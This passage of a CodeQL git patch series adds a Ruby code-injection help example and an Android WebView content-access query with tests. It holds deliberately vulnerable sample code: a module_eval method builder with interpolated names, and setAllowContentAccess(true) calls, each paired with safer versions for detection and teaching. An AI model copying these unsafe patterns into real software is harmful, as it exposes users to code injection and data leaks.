hasPathInjection=121 + let _ = SerializedDatabase(path: "", configuration: Configuration(), defaultLabel: "", purpose: nil) // Safe } func testSanitizers() { @@ -170,5 +211,5 @@ func testSanitizers() { if (filePath.lexicallyNormalized().starts(with: FilePath(stringLiteral: "/safe"))) { fm.contents(atPath: remoteString) // Safe } - fm.contents(atPath: remoteString) // $ hasPathInjection=165 + fm.contents(atPath: remoteString) // $ hasPathInjection=206 } From d3812f5906db7e01f0b9d50a6e8b3efd4ab1c9f8 Mon Sep 17 00:00:00 2001 From: Harry Maclean Date: Wed, 28 Dec 2022 11:20:56 +1300 Subject: [PATCH 076/381] Ruby: Add another code injection example to qhelp --- .../cwe-094/UnsafeCodeConstruction.qhelp | 26 +++++++++++++++++++ .../examples/UnsafeCodeConstruction3.rb | 12 +++++++++ .../examples/UnsafeCodeConstruction3Safe.rb | 9 +++++++ 3 files changed, 47 insertions(+) create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index 34227b85539..92821f9d759 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -66,6 +66,26 @@ to define the getter method. + +

    +This example dynamically registers a method on another class which +forwards its arguments to the registering module. This approach uses +module_eval and string interpolation to construct class variables +and methods. +

    + + + +

    +A safer approach is to use class_variable_set and +class_variable_get along with define_method. String +interpolation is still used to construct the class variable name, but this is +safe because class_variable_set is not susceptible to code injection. +

    + + +     +
  • OWASP: @@ -74,5 +94,11 @@ OWASP:
  • Wikipedia: Code Injection.
    • +
  • +Ruby documentation: define_method. +
    • +
  • +Ruby documentation: class_variable_set. +
    •      diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb new file mode 100644 index 00000000000..69ea7e03e7b --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb @@ -0,0 +1,12 @@ +module Invoker + def attach(klass, name) + invoker = self + klass.module_eval <<-CODE + @@#{name} = invoker + + def #{name}(*args) + @@#{name}.call(*args) + end + CODE + end +end diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb new file mode 100644 index 00000000000..d18fbf78d98 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb @@ -0,0 +1,9 @@ +module Invoker + def attach(klass, name) + var = :"@@#{name}" + klass.class_variable_set(var, self) + klass.define_method(name) do |*args| + self.class.class_variable_get(var).call(*args) + end + end +end From a6571a05aba788fbc65550195e3c1427631a279d Mon Sep 17 00:00:00 2001 From: Harry Maclean Date: Wed, 28 Dec 2022 11:34:55 +1300 Subject: [PATCH 077/381] Ruby: Include send example in qhelp --- .../queries/security/cwe-094/UnsafeCodeConstruction.qhelp | 8 +++++++- .../security/cwe-094/examples/UnsafeCodeConstruction3.rb | 7 +++---- .../cwe-094/examples/UnsafeCodeConstruction3Safe.rb | 7 ++++--- 3 files changed, 14 insertions(+), 8 deletions(-) diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index 92821f9d759..97c7adf4c87 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -69,7 +69,7 @@ to define the getter method.

    This example dynamically registers a method on another class which -forwards its arguments to the registering module. This approach uses +forwards its arguments to a target class. This approach uses module_eval and string interpolation to construct class variables and methods.

    @@ -81,6 +81,12 @@ A safer approach is to use class_variable_set and class_variable_get along with define_method. String interpolation is still used to construct the class variable name, but this is safe because class_variable_set is not susceptible to code injection. +To construct a dynamic method call we use send, which is ulnerable +to code injection: if an attacker can control the first argument, they can call +any method on the receiver. However this is less powerful than being able to run +arbitrary Ruby code, so it is an improvement in security. We also document to +callers that they should not pass arbitrary user data to the name +parameter.

    diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb index 69ea7e03e7b..e1a81bafe52 100644 --- a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3.rb @@ -1,11 +1,10 @@ module Invoker - def attach(klass, name) - invoker = self + def attach(klass, name, target) klass.module_eval <<-CODE - @@#{name} = invoker + @@#{name} = target def #{name}(*args) - @@#{name}.call(*args) + @@#{name}.#{name}(*args) end CODE end diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb index d18fbf78d98..65608f8aa20 100644 --- a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb @@ -1,9 +1,10 @@ module Invoker - def attach(klass, name) + # Do not pass arbitrary user input to +name+. + def attach(klass, name, target) var = :"@@#{name}" - klass.class_variable_set(var, self) + klass.class_variable_set(var, target) klass.define_method(name) do |*args| - self.class.class_variable_get(var).call(*args) + self.class.class_variable_get(var).send(name, *args) end end end From e259ef5d1dced3d9ba5a7094c7e83c0e5a54f55f Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Wed, 26 Oct 2022 12:33:36 -0400 Subject: [PATCH 078/381] Java: Add class for `android.webkit.WebSettings.setAllowContentAccess` --- .../lib/semmle/code/java/frameworks/android/WebView.qll | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll b/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll index dadcef4158e..2a6d869c0fd 100644 --- a/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll +++ b/java/ql/lib/semmle/code/java/frameworks/android/WebView.qll @@ -78,6 +78,14 @@ class WebViewSetWebViewClientMethod extends Method { } } +/** The method `setAllowContentAccess` of the class `android.webkit.WebSettings` */ +class AllowContentAccessMethod extends Method { + AllowContentAccessMethod() { + this.getDeclaringType() instanceof TypeWebSettings and + this.hasName("setAllowContentAccess") + } +} + /** The method `shouldOverrideUrlLoading` of the class `android.webkit.WebViewClient`. */ class ShouldOverrideUrlLoading extends Method { ShouldOverrideUrlLoading() { From e4e13d38b71701ee99674d55ec275e9a24258d5f Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Fri, 11 Nov 2022 22:34:39 -0500 Subject: [PATCH 079/381] Java: query for Android WebView setAllowContentAccess --- .../AndroidWebViewSettingsContentAccess.qhelp | 35 +++++++++++++++++++ .../AndroidWebViewSettingsContentAccess.ql | 21 +++++++++++ .../CWE/CWE-200/ContentAccessEnabled.java | 3 ++ 3 files changed, 59 insertions(+) create mode 100644 java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp create mode 100644 java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql create mode 100644 java/ql/src/Security/CWE/CWE-200/ContentAccessEnabled.java diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp new file mode 100644 index 00000000000..6f4dbb3505a --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp @@ -0,0 +1,35 @@ + + + +

    Android can provide access to content providers within a WebView using + the setAllowContentAccess setting.

    + +

    Allowing access to content providers via content:// URLs + may allow JavaScript to access protected content.

    +     + + +

    + If your app does not require access to the content:// URL + functionality, you should explicitly disable the setting by + calling setAllowContentAccess(false) on the settings of the + WebView. +

    +     + + +

    In the following (bad) example, access to content:// URLs is explicitly allowed.

    + + + +     + + +
  • + Android Documentation: setAllowContentAccess. +
    • +     + +     diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql new file mode 100644 index 00000000000..8bc72059373 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql @@ -0,0 +1,21 @@ +/** + * @name Android WebSettings content access + * @description Access to content providers in a WebView can enable JavaScript to access protected information. + * @kind problem + * @id java/android-websettings-content-access + * @problem.severity warning + * @security-severity 6.5 + * @precision high + * @tags security + * external/cwe/cwe-200 + */ + +import java +import semmle.code.java.frameworks.android.WebView + +from MethodAccess ma +where + ma.getMethod() instanceof AllowContentAccessMethod and + ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = true +select ma, + "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." diff --git a/java/ql/src/Security/CWE/CWE-200/ContentAccessEnabled.java b/java/ql/src/Security/CWE/CWE-200/ContentAccessEnabled.java new file mode 100644 index 00000000000..3e5e6cb466b --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/ContentAccessEnabled.java @@ -0,0 +1,3 @@ +WebSettings settings = webview.getSettings(); + +settings.setAllowContentAccess(true); From a023726c0384c3af71a5362b1889ff5edd16495c Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Wed, 16 Nov 2022 00:04:56 -0500 Subject: [PATCH 080/381] Java: add Android stubs to options file for CWE-200 tests --- java/ql/test/query-tests/security/CWE-200/semmle/tests/options | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/options b/java/ql/test/query-tests/security/CWE-200/semmle/tests/options index 21cf6382c4e..972719b0431 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/options +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/apache-commons-lang3-3.7/:${testdir}/../../../../../stubs/google-android-9.0.0 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../stubs/apache-commons-lang3-3.7/:${testdir}/../../../../../stubs/google-android-9.0.0 From 7cc53126f3782bc4f848ecbdb7b79cc77444ece2 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Wed, 16 Nov 2022 00:05:41 -0500 Subject: [PATCH 081/381] Java: WebView setAllowContentAccess query test cases --- .../semmle/tests/WebViewContentAccess.expected | 1 + .../semmle/tests/WebViewContentAccess.java | 18 ++++++++++++++++++ .../semmle/tests/WebViewContentAccess.qlref | 1 + 3 files changed, 20 insertions(+) create mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected create mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java create mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected new file mode 100644 index 00000000000..f354c5658f0 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected @@ -0,0 +1 @@ +| WebViewContentAccess.java:10:9:10:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java new file mode 100644 index 00000000000..522787d5d03 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java @@ -0,0 +1,18 @@ +package com.example.test; + +import android.webkit.WebView; +import android.webkit.WebSettings; + +public class WebViewContentAccess { + void configureWebViewUnsafe(WebView view) { + WebSettings settings = view.getSettings(); + + settings.setAllowContentAccess(true); + } + + void configureWebViewSafe(WebView view) { + WebSettings settings = view.getSettings(); + + settings.setAllowContentAccess(false); + } +} diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref new file mode 100644 index 00000000000..f907dcc5755 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref @@ -0,0 +1 @@ +Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql From 8a763015e6197ecd701b7225ea919021d922e29b Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Wed, 7 Dec 2022 12:17:34 -0500 Subject: [PATCH 082/381] Reduce precision rating to medium This query won't always be a security problem, so it should have a lower precision rating than `high`. --- .../Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql index 8bc72059373..3b2c9f69c7a 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql @@ -5,7 +5,7 @@ * @id java/android-websettings-content-access * @problem.severity warning * @security-severity 6.5 - * @precision high + * @precision medium * @tags security * external/cwe/cwe-200 */ From da25c586e6072f817b80fbba949ba90d6b3e9f99 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Wed, 7 Dec 2022 12:19:22 -0500 Subject: [PATCH 083/381] Dataflow query for detecting paths that disable content access Since the default value is `true`, we need to determine whether or not the `setAllowContentAccess` method is ever called using dataflow. --- ...roidWebViewSettingsPermitsContentAccess.ql | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql new file mode 100644 index 00000000000..a6394db7071 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -0,0 +1,38 @@ +/** + * @id java/android-websettings-permit-contentacces + */ + +import java +import semmle.code.java.dataflow.DataFlow +import semmle.code.java.frameworks.android.WebView + +private class TypeWebViewOrSubclass extends RefType { + TypeWebViewOrSubclass() { this.getASupertype*() instanceof TypeWebView } +} + +// source: WebView +// sink: settings.setAllowContentAccess(false) +class WebViewDisallowContentAccessConfiguration extends DataFlow::Configuration { + WebViewDisallowContentAccessConfiguration() { this = "WebViewDisallowContentAccessConfiguration" } + + override predicate isSource(DataFlow::Node source) { + source.asExpr().getType() instanceof TypeWebViewOrSubclass and + ( + source.asExpr() instanceof ClassInstanceExpr or + source.asExpr() instanceof MethodAccess or + source.asExpr().(CastExpr).getAChildExpr() instanceof MethodAccess + ) + } + + override predicate isSink(DataFlow::Node sink) { + exists(MethodAccess ma | + ma = sink.asExpr() and + ma.getMethod().hasName("setAllowContentAccess") and + ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = false + ) + } +} + +from DataFlow::Node e, WebViewDisallowContentAccessConfiguration cfg +where cfg.isSource(e) and not cfg.hasFlow(e, _) +select e From 778749184b8e98f856f71f83fe9f2dd74d0947c9 Mon Sep 17 00:00:00 2001 From: Edward Minnix III Date: Wed, 21 Dec 2022 11:04:50 -0500 Subject: [PATCH 084/381] Change id to use android/ instead of prepending android- Co-authored-by: Tony Torralba --- .../Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql index 3b2c9f69c7a..1657f417754 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql @@ -2,7 +2,7 @@ * @name Android WebSettings content access * @description Access to content providers in a WebView can enable JavaScript to access protected information. * @kind problem - * @id java/android-websettings-content-access + * @id java/android/websettings-content-access * @problem.severity warning * @security-severity 6.5 * @precision medium From 0e15dd9fa914339fc930743b332d0be04a8584e7 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 22 Dec 2022 12:14:34 -0500 Subject: [PATCH 085/381] Query metadata --- .../AndroidWebViewSettingsPermitsContentAccess.ql | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index a6394db7071..5fd9e977e17 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -1,5 +1,12 @@ /** - * @id java/android-websettings-permit-contentacces + * @name Android WebView settings permits content access + * @id java/android/websettings-permit-contentacces + * @description Access to content providers in a WebView can permit access to protected information by loading content:// links. + * @kind problem + * @problem.severity warning + * @precision medium + * @tags security + * external/cwe/cwe-200 */ import java From 973f649e76a629a205ad44d0b372665e3523eb53 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 22 Dec 2022 12:16:07 -0500 Subject: [PATCH 086/381] Break dataflow into two steps in order to capture flow from WebView to settings call --- ...roidWebViewSettingsPermitsContentAccess.ql | 83 +++++++++++++++---- 1 file changed, 68 insertions(+), 15 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 5fd9e977e17..2a2fc701c16 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -17,29 +17,82 @@ private class TypeWebViewOrSubclass extends RefType { TypeWebViewOrSubclass() { this.getASupertype*() instanceof TypeWebView } } -// source: WebView -// sink: settings.setAllowContentAccess(false) -class WebViewDisallowContentAccessConfiguration extends DataFlow::Configuration { - WebViewDisallowContentAccessConfiguration() { this = "WebViewDisallowContentAccessConfiguration" } +/** + * A method access to a getter method which is private. + * + * In Kotlin, member accesses are translated to getter methods. + */ +private class PrivateGetterMethodAccess extends MethodAccess { + PrivateGetterMethodAccess() { + this instanceof MethodAccess and + this.getMethod() instanceof GetterMethod and + this.getMethod().isPrivate() + } +} - override predicate isSource(DataFlow::Node source) { - source.asExpr().getType() instanceof TypeWebViewOrSubclass and +/** + * A flow configuration for tracking flow from the creation of a `WebView` object to a call of the `getSettings` method. + */ +private class WebViewGetSettingsConfiguration extends DataFlow::Configuration { + WebViewGetSettingsConfiguration() { this = "WebViewGetSettingsConfiguration" } + + override predicate isSource(DataFlow::Node node) { + node.asExpr().getType().(RefType) instanceof TypeWebViewOrSubclass and + // To reduce duplicate results, we only consider WebView objects from + // constructor and method calls, or method accesses which are cast to WebView. ( - source.asExpr() instanceof ClassInstanceExpr or - source.asExpr() instanceof MethodAccess or - source.asExpr().(CastExpr).getAChildExpr() instanceof MethodAccess - ) + node.asExpr() instanceof ClassInstanceExpr or + node.asExpr() instanceof MethodAccess or + node.asExpr().(CastExpr).getAChildExpr() instanceof MethodAccess + ) and + // Avoid duplicate results from Kotlin member accesses. + not node.asExpr() instanceof PrivateGetterMethodAccess } - override predicate isSink(DataFlow::Node sink) { + override predicate isSink(DataFlow::Node node) { exists(MethodAccess ma | - ma = sink.asExpr() and + ma.getQualifier() = node.asExpr() and + ma.getMethod() instanceof WebViewGetSettingsMethod + ) + } +} + +private class WebSettingsSetAllowContentAccessFalseConfiguration extends DataFlow::Configuration { + WebSettingsSetAllowContentAccessFalseConfiguration() { + this = "WebSettingsSetAllowContentAccessFalseConfiguration" + } + + override predicate isSource(DataFlow::Node node) { + node.asExpr().getType() instanceof TypeWebSettings + } + + override predicate isSink(DataFlow::Node node) { + // sink: settings.setAllowContentAccess(false) + // or (in Kotlin): settings.allowContentAccess = false + exists(MethodAccess ma | + ma.getQualifier() = node.asExpr() and ma.getMethod().hasName("setAllowContentAccess") and ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = false ) } } -from DataFlow::Node e, WebViewDisallowContentAccessConfiguration cfg -where cfg.isSource(e) and not cfg.hasFlow(e, _) -select e +predicate hasContentAccessDisabled(Expr webview) { + exists( + DataFlow::Node wvSource, DataFlow::Node wvSink, WebViewGetSettingsConfiguration viewCfg, + DataFlow::Node settingsSource, DataFlow::Node settingsSink, + WebSettingsSetAllowContentAccessFalseConfiguration settingsCfg, MethodAccess getSettingsAccess + | + wvSource = DataFlow::exprNode(webview) and + viewCfg.hasFlow(wvSource, wvSink) and + settingsCfg.hasFlow(settingsSource, settingsSink) and + getSettingsAccess.getQualifier() = wvSink.asExpr() and + getSettingsAccess.getMethod() instanceof WebViewGetSettingsMethod and + getSettingsAccess = settingsSource.asExpr() + ) +} + +from Expr source, WebViewGetSettingsConfiguration cfg +where cfg.isSource(DataFlow::exprNode(source)) and not hasContentAccessDisabled(source) +select source, + "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." From 5265cb4b03de68e7c87118c1f5737dac90f2ff8e Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 22 Dec 2022 16:06:44 -0500 Subject: [PATCH 087/381] Merge two dataflow configurations into one taint tracking --- ...roidWebViewSettingsPermitsContentAccess.ql | 102 +++++++++--------- 1 file changed, 52 insertions(+), 50 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 2a2fc701c16..17ef02a854f 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -10,9 +10,10 @@ */ import java -import semmle.code.java.dataflow.DataFlow +import semmle.code.java.dataflow.TaintTracking import semmle.code.java.frameworks.android.WebView +/** Represents `android.webkit.WebView` and its subclasses. */ private class TypeWebViewOrSubclass extends RefType { TypeWebViewOrSubclass() { this.getASupertype*() instanceof TypeWebView } } @@ -30,69 +31,70 @@ private class PrivateGetterMethodAccess extends MethodAccess { } } -/** - * A flow configuration for tracking flow from the creation of a `WebView` object to a call of the `getSettings` method. - */ -private class WebViewGetSettingsConfiguration extends DataFlow::Configuration { - WebViewGetSettingsConfiguration() { this = "WebViewGetSettingsConfiguration" } - - override predicate isSource(DataFlow::Node node) { - node.asExpr().getType().(RefType) instanceof TypeWebViewOrSubclass and +/** A source for `android.webkit.WebView` objects. */ +class WebViewSource extends DataFlow::Node { + WebViewSource() { + this.getType().(RefType) instanceof TypeWebViewOrSubclass and // To reduce duplicate results, we only consider WebView objects from // constructor and method calls, or method accesses which are cast to WebView. ( - node.asExpr() instanceof ClassInstanceExpr or - node.asExpr() instanceof MethodAccess or - node.asExpr().(CastExpr).getAChildExpr() instanceof MethodAccess + this.asExpr() instanceof ClassInstanceExpr or + this.asExpr() instanceof MethodAccess or + this.asExpr().(CastExpr).getAChildExpr() instanceof MethodAccess ) and // Avoid duplicate results from Kotlin member accesses. - not node.asExpr() instanceof PrivateGetterMethodAccess + not this.asExpr() instanceof PrivateGetterMethodAccess + } +} + +/** + * A sink representing a call to `android.webkit.WebSettings.setAllowContentAccess` that + * disables content access. + */ +class WebSettingsDisallowContentAccessSink extends DataFlow::Node { + WebSettingsDisallowContentAccessSink() { + exists(MethodAccess ma | + ma.getQualifier() = this.asExpr() and + ma.getMethod() instanceof AllowContentAccessMethod and + ma.getArgument(0).(BooleanLiteral).getBooleanValue() = false + ) + } +} + +class WebViewDisallowContentAccessConfiguration extends TaintTracking::Configuration { + WebViewDisallowContentAccessConfiguration() { this = "WebViewDisallowContentAccessConfiguration" } + + override predicate isSource(DataFlow::Node node, DataFlow::FlowState state) { + state instanceof DataFlow::FlowStateEmpty and + node instanceof WebViewSource } - override predicate isSink(DataFlow::Node node) { + /** + * Holds if the step from `node1` to `node2` is a dataflow step that gets the `WebSettings` object + * from the `getSettings` method of a `WebView` object. + */ + override predicate isAdditionalTaintStep( + DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2, + DataFlow::FlowState state2 + ) { + state1 instanceof DataFlow::FlowStateEmpty and + state2 = "WebSettings" and + // settings = webView.getSettings() + // ^node2 = ^node1 exists(MethodAccess ma | - ma.getQualifier() = node.asExpr() and + ma = node2.asExpr() and + ma.getQualifier() = node1.asExpr() and ma.getMethod() instanceof WebViewGetSettingsMethod ) } -} -private class WebSettingsSetAllowContentAccessFalseConfiguration extends DataFlow::Configuration { - WebSettingsSetAllowContentAccessFalseConfiguration() { - this = "WebSettingsSetAllowContentAccessFalseConfiguration" - } - - override predicate isSource(DataFlow::Node node) { - node.asExpr().getType() instanceof TypeWebSettings - } - - override predicate isSink(DataFlow::Node node) { - // sink: settings.setAllowContentAccess(false) - // or (in Kotlin): settings.allowContentAccess = false - exists(MethodAccess ma | - ma.getQualifier() = node.asExpr() and - ma.getMethod().hasName("setAllowContentAccess") and - ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = false - ) + override predicate isSink(DataFlow::Node node, DataFlow::FlowState state) { + state = "WebSettings" and + node instanceof WebSettingsDisallowContentAccessSink } } -predicate hasContentAccessDisabled(Expr webview) { - exists( - DataFlow::Node wvSource, DataFlow::Node wvSink, WebViewGetSettingsConfiguration viewCfg, - DataFlow::Node settingsSource, DataFlow::Node settingsSink, - WebSettingsSetAllowContentAccessFalseConfiguration settingsCfg, MethodAccess getSettingsAccess - | - wvSource = DataFlow::exprNode(webview) and - viewCfg.hasFlow(wvSource, wvSink) and - settingsCfg.hasFlow(settingsSource, settingsSink) and - getSettingsAccess.getQualifier() = wvSink.asExpr() and - getSettingsAccess.getMethod() instanceof WebViewGetSettingsMethod and - getSettingsAccess = settingsSource.asExpr() - ) -} - -from Expr source, WebViewGetSettingsConfiguration cfg -where cfg.isSource(DataFlow::exprNode(source)) and not hasContentAccessDisabled(source) +from WebViewSource source +where not any(WebViewDisallowContentAccessConfiguration cfg).hasFlow(source, _) select source, "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." From 9ef319f6598919c3644b4114e9287dbe61751cf5 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 22 Dec 2022 20:46:14 -0500 Subject: [PATCH 088/381] Java: setAllowContentAccess query tests --- .../semmle/tests/WebViewContentAccess.java | 51 +++++++++++++++++-- .../WebViewContentAccessDataFlow.expected | 5 ++ .../tests/WebViewContentAccessDataFlow.qlref | 1 + 3 files changed, 52 insertions(+), 5 deletions(-) create mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected create mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java index 522787d5d03..7dd4aa89347 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.java @@ -1,18 +1,59 @@ package com.example.test; +import android.app.Activity; + import android.webkit.WebView; import android.webkit.WebSettings; -public class WebViewContentAccess { - void configureWebViewUnsafe(WebView view) { - WebSettings settings = view.getSettings(); +/** Helper class to mock a method which returns a `WebView` */ +interface WebViewGetter { + WebView getAWebView(); +} - settings.setAllowContentAccess(true); +public class WebViewContentAccess extends Activity { + void enableContentAccess(WebView webview) { + webview.getSettings().setAllowContentAccess(true); } - void configureWebViewSafe(WebView view) { + void disableContentAccess(WebView webview) { + webview.getSettings().setAllowContentAccess(false); + } + + void configureWebViewSafe(WebView view, WebViewGetter getter) { WebSettings settings = view.getSettings(); settings.setAllowContentAccess(false); + + WebView view2 = (WebView) findViewById(0); + settings = view2.getSettings(); + + settings.setAllowContentAccess(false); + + disableContentAccess(getter.getAWebView()); + } + + void configureWebViewUnsafe(WebView view1, WebViewGetter getter) { + WebSettings settings; + + view1.getSettings().setAllowContentAccess(true); + + // Cast expression + WebView view2 = (WebView) findViewById(0); + settings = view2.getSettings(); + settings.setAllowContentAccess(true); + + // Constructor + WebView view3 = new WebView(this); + settings = view3.getSettings(); + settings.setAllowContentAccess(true); + + // Method access + WebView view4 = getter.getAWebView(); + settings = view4.getSettings(); + settings.setAllowContentAccess(true); + + enableContentAccess(getter.getAWebView()); + + WebView view5 = getter.getAWebView(); } } diff --git 